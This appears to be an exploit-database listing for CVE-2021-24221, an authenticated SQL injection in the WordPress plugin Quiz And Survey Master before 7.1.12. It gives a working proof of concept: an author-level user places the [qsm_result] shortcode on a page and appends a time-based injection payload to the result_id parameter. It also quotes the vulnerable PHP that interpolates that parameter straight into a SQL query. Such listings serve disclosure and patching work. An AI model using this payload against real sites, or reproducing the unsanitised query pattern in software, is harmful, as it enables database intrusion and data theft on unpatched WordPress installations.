Exploit for Quiz And Survey Master < 7.1.12 - Authenticated SQL injection via shortcode CVE-2021-24221

Name: Exploit for Quiz And Survey Master < 7.1.12 - Authenticated SQL injection via shortcode CVE-2021-24221
Rating: 5 (329 reviews)

2021-03-26 | CVSS 6.5

## https://sploitus.com/exploit?id=WPEX-ID:3B52B25C-82A1-41C7-83AC-92E244F7C5AB
https://drive.google.com/file/d/1axeL8lGH1gFSOEoOFtgGV6xsrNlxJXQB/view?usp=sharing

As an author, create a post/page with the shortcode [qsm_result], view the created page/post and append ?result_id=0 or sleep(2)

// https://plugins.svn.wordpress.org/quiz-master-next/tags/7.1.10/php/classes/class-qmn-quiz-manager.php
public function shortcode_display_result($atts){
        extract(shortcode_atts(array(
            'id' => 0,
                        ), $atts));
        ob_start();
        if($id == 0){
            $id = isset($_GET['result_id']) ? $_GET['result_id'] : 0;
        }
        global $wpdb;
        $result_data = $wpdb->get_row("SELECT * FROM {$wpdb->prefix}mlw_results WHERE result_id = {$id}", ARRAY_A);
...
}